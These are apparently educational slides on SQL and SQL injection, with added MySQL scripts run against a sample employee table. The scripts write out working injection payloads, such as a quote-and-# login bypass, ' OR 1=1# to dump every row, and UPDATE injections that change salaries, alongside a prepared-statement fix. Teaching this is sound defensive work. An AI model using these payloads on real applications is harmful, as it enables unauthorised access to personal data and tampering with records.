SQL Injection Attacks: Understanding the Threat and Prevention Techniques, Slides of Database Management Systems (DBMS)

Slides introducing SQL and explaining how SQL Injection attacks occur and the fundamental cause of the vulnerability: user-supplied data becoming part of the SQL statement itself. They also cover countermeasures such as filtering and encoding data, and the use of prepared statements for secure database interactions in web applications.

Typology: Slides

2021/2022

Uploaded on 09/27/2022

Uploaded by: arwen


SQL Injection Attack

Brief Tutorial of SQL

  • Log in to MySQL: We will use MySQL, an open-source relational database management system. We can log in with the mysql client using the following command:
  • Create a database: Inside MySQL, we can create multiple databases. The “SHOW DATABASES” command lists the existing databases. We will create a new database called dbtest:

SQL Tutorial: Insert a Row

  • We can use the INSERT INTO statement to insert a new record into a table:
  • Here, we insert a record into the “employee” table.
  • We do not specify a value for the ID column; it is an AUTO_INCREMENT column, so the database assigns it automatically.

SQL Tutorial: SELECT Statement

  • The SELECT statement is the most common operation on databases.
  • It retrieves information from a database. The first query asks the database for all its records, including all the columns; the second asks only for the Name, EID and Salary columns.

SQL Tutorial: WHERE Clause

  • The first query returns the record whose EID field is ‘EID5001’
  • The second query returns the records that satisfy either EID=‘EID5001’ or Name=‘David’

SQL Tutorial: WHERE Clause

  • If the WHERE condition is always true, every row is affected by the SQL statement
  • The 1=1 predicate looks quite useless in real queries, but it becomes useful in SQL Injection attacks: appended with OR, it makes the whole WHERE clause true for every row

SQL Tutorial: Comments

MySQL supports three comment styles:

  • Text from the # character to the end of the line is treated as a comment
  • Text from “-- ” to the end of the line is treated as a comment. In MySQL the two dashes must be followed by a space (or another whitespace character); “--x” is not a comment
  • As in the C language, text between /* and */ is treated as a comment
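
As an added example, not taken from the original slides, the following MySQL script runs the whole tutorial above in one session: it creates dbtest, an employee table, inserts a few rows, and then issues the SELECT, WHERE, 1=1 and comment examples. The table layout (ID, Name, EID, Password, Salary, SSN) is assumed from the columns the slides mention, and the three employee rows are constructed sample data. MySQL compares column names case-insensitively, so EID and eid refer to the same column.

```sql
-- Added example (not from the original slides). Run with:
--   mysql -u <user> -p < tutorial.sql
-- Table layout and sample rows are assumptions for illustration.
CREATE DATABASE IF NOT EXISTS dbtest;
SHOW DATABASES;          -- dbtest now appears in the list
USE dbtest;

CREATE TABLE employee (
    ID       INT          NOT NULL AUTO_INCREMENT,  -- filled in by the database
    Name     VARCHAR(30)  NOT NULL,
    EID      VARCHAR(7)   NOT NULL,
    Password VARCHAR(60)  NOT NULL,
    Salary   INT,
    SSN      VARCHAR(11),
    PRIMARY KEY (ID)
);

-- Insert rows; the ID column is omitted and assigned automatically.
INSERT INTO employee (Name, EID, Password, Salary, SSN)
VALUES ('Alice', 'EID5000', 'paSSw0rd', 80000, '555-11-1111'),
       ('Bob',   'EID5001', 'bobpass',  60000, '555-22-2222'),
       ('David', 'EID5002', 'davidpw',  70000, '555-33-3333');

-- SELECT: every column of every row, then only three columns.
SELECT * FROM employee;
SELECT Name, EID, Salary FROM employee;

-- WHERE: one exact match, then a disjunction of two conditions.
SELECT Name, EID, Salary FROM employee WHERE EID = 'EID5001';
SELECT Name, EID, Salary FROM employee WHERE EID = 'EID5001' OR Name = 'David';

-- A predicate that is always true selects (or, in UPDATE/DELETE, affects) every row.
SELECT Name, EID, Salary FROM employee WHERE 1 = 1;

-- The three MySQL comment styles. "--" only starts a comment when followed
-- by whitespace; "#" needs no trailing space, which is why attackers prefer it.
SELECT Name FROM employee WHERE EID = 'EID5000'; # hash comment to end of line
SELECT Name FROM employee WHERE EID = 'EID5000'; -- double-dash comment
SELECT /* inline comment */ Name FROM employee WHERE EID = 'EID5000';
```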

Interacting with Database in Web Application

  • A typical web application consists of three major components: the user’s web browser, the web server running the application code, and the database server
  • SQL Injection attacks can cause damage to the database. As the figure shows, users do not interact with the database directly but through the web server. If this channel is not implemented properly, malicious users can attack the database through it.

Getting Data from User

  • The request shown is an HTTP GET request, because the method attribute of the HTML form specifies GET
  • In GET requests, parameters are attached after the question mark in the URL
  • Each parameter is a name=value pair, and pairs are separated by “&”
  • With HTTPS the format is the same, but the request is encrypted in transit, so the parameters are not visible on the network
  • Once the request reaches the target PHP script, the parameters inside the HTTP request are available in the $_GET array (or $_POST for POST requests). The following example shows a PHP script getting data from a GET request

How Web Applications Interact with Database

Connecting to MySQL Database

  • The PHP program must connect to the database server before it can run any query on the database.
  • The code shown below uses new mysqli(…) with its four arguments (host, user name, password and database name) to create the database connection.

Launching SQL Injection Attacks

  • Everything provided by the user becomes part of the SQL statement. Is it possible for a user to change the meaning of the SQL statement?
  • The web app developer’s intention with the following statement is for the user to provide data for the blank areas only.
  • Assume that a user inputs a random string in the password entry and types “EID5002’#” in the eid entry. The SQL statement will become the following

Launching SQL Injection Attacks

  • Everything from the # sign to the end of the line is treated as a comment, so the password condition is discarded. The SQL statement is equivalent to the following:
  • The above statement returns the name, salary and SSN of the employee whose EID is EID5002 even though the user does not know the employee’s password. This is a security breach: the authentication check has been bypassed.
  • Let us see whether a user can get all the records from the database, assuming we do not know all the EIDs in the database.
  • We need to create a predicate for the WHERE clause that is true for all records.
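
As an added example, not from the original slides, the following MySQL script shows the login query as the server builds it for honest input, for the two injected inputs described above, and for the same payload sent through a server-side prepared statement (the countermeasure the slides go on to cover). The query template SELECT Name, Salary, SSN FROM employee WHERE eid='$eid' AND password='$pwd', with $eid and $pwd copied verbatim from the request, is an assumption about the PHP script, and the employee table and rows are the constructed ones from the tutorial example.

```sql
-- Added example (not from the original slides). Assumes the tutorial's
-- dbtest.employee table and a vulnerable server-side template of the form
--   SELECT Name, Salary, SSN FROM employee WHERE eid='$eid' AND password='$pwd'
USE dbtest;

-- 1. Honest use: eid = EID5002, pwd = davidpw  (returns David's row)
SELECT Name, Salary, SSN FROM employee
 WHERE eid = 'EID5002' AND password = 'davidpw';

-- 2. Attack: eid = EID5002'#  and pwd = xyz (anything).
--    The quote closes the string literal and # comments out the rest.
--    Note the terminator must sit on the next line here, since # eats the
--    rest of this one; the web app sends the statement without one anyway.
SELECT Name, Salary, SSN FROM employee
 WHERE eid = 'EID5002'#' AND password = 'xyz'
;
--    ...which the parser sees as (David's row, no password needed):
SELECT Name, Salary, SSN FROM employee WHERE eid = 'EID5002';

-- 3. Attack without knowing any EID: eid = ' OR 1=1#  and pwd = xyz
SELECT Name, Salary, SSN FROM employee
 WHERE eid = '' OR 1=1#' AND password = 'xyz'
;
--    ...equivalent to dumping the whole table:
SELECT Name, Salary, SSN FROM employee WHERE 1=1;

-- 4. Same payload through a prepared statement: the statement is parsed
--    first and the values are bound afterwards, so the quote and # are just
--    characters compared against the eid column and no row matches.
PREPARE login FROM
  'SELECT Name, Salary, SSN FROM employee WHERE eid = ? AND password = ?';
SET @eid = 'EID5002''#', @pwd = 'xyz';   -- '' inside a literal is one quote
EXECUTE login USING @eid, @pwd;          -- Empty set
DEALLOCATE PREPARE login;
```

Running the script against the tutorial table shows queries 2 and 3 returning David's row and all three rows respectively, while query 4, which receives the identical bytes, returns nothing: the difference is not in the input but in whether the input is parsed as SQL.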

Modify Database

  • If the statement is UPDATE or INSERT INTO, the attacker has a chance to change the database.
  • Consider the form created for changing passwords. It asks users to fill in three pieces of information: EID, old password and new password.
  • When the Submit button is clicked, an HTTP POST request is sent to the server-side script changepassword.php, which uses an UPDATE statement to change the user’s password.

Modify Database

  • Let us assume that Alice (EID5000) is not satisfied with the salary she gets. She would like to increase her own salary using the SQL injection vulnerability. She types her own EID and old password, and the following into the “New Password” box:
  • By typing the above string in the “New Password” box, we get the UPDATE statement to set one more attribute for us, the salary attribute. The SQL statement will now look as follows.
  • What if Alice doesn’t like Bob and would like to reduce Bob’s salary to 0, but she only knows Bob’s EID (eid5001), not his password. How can she execute the attack?
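
As an added example, not from the original slides, the following MySQL script shows the UPDATE statement that changepassword.php would build for Alice's salary attack, and then this example's own answer to the question posed above: the same technique applied to the WHERE clause. The template UPDATE employee SET password='$newpwd' WHERE eid='$eid' AND password='$oldpwd', with the three form fields inserted unescaped, is an assumption about the script; the employee table and rows are the constructed ones from the tutorial example (Alice's old password there is paSSw0rd).

```sql
-- Added example (not from the original slides). Assumes the tutorial's
-- dbtest.employee table and a vulnerable server-side template of the form
--   UPDATE employee SET password='$newpwd' WHERE eid='$eid' AND password='$oldpwd'
USE dbtest;

-- Intended use: the new password is the only thing the user controls.
--   UPDATE employee SET password='newpw' WHERE eid='EID5000' AND password='paSSw0rd'

-- Alice types into New Password:   newpw', salary='100000
-- The quote ends the password literal; the remainder adds a second
-- assignment to the SET list, and the rest of the template still parses.
UPDATE employee SET password = 'newpw', salary='100000'
 WHERE eid = 'EID5000' AND password = 'paSSw0rd';
SELECT Name, Salary FROM employee WHERE eid = 'EID5000';   -- Alice, 100000

-- Answer to the question above: Alice knows only Bob's EID. She submits her
-- own EID and any old password, and types into New Password:
--   xyz', salary='0' WHERE eid='EID5001'#
-- The # discards the original WHERE clause, so Bob's row is the one updated
-- and his password is never checked. (MySQL's default collation also makes
-- 'eid5001' match 'EID5001'.) The terminator sits on the next line because
-- # swallows the rest of this one.
UPDATE employee SET password = 'xyz', salary='0' WHERE eid='EID5001'#' WHERE eid = 'EID5000' AND password = 'whatever'
;
SELECT Name, Salary FROM employee WHERE eid = 'EID5001';   -- Bob, 0
```

Both statements are ordinary, syntactically valid UPDATEs once they reach the server; nothing in the database can tell that half of each came from a form field, which is why the fix has to happen before the statement is parsed (escaping the input, or binding it through a prepared statement as in the login example above).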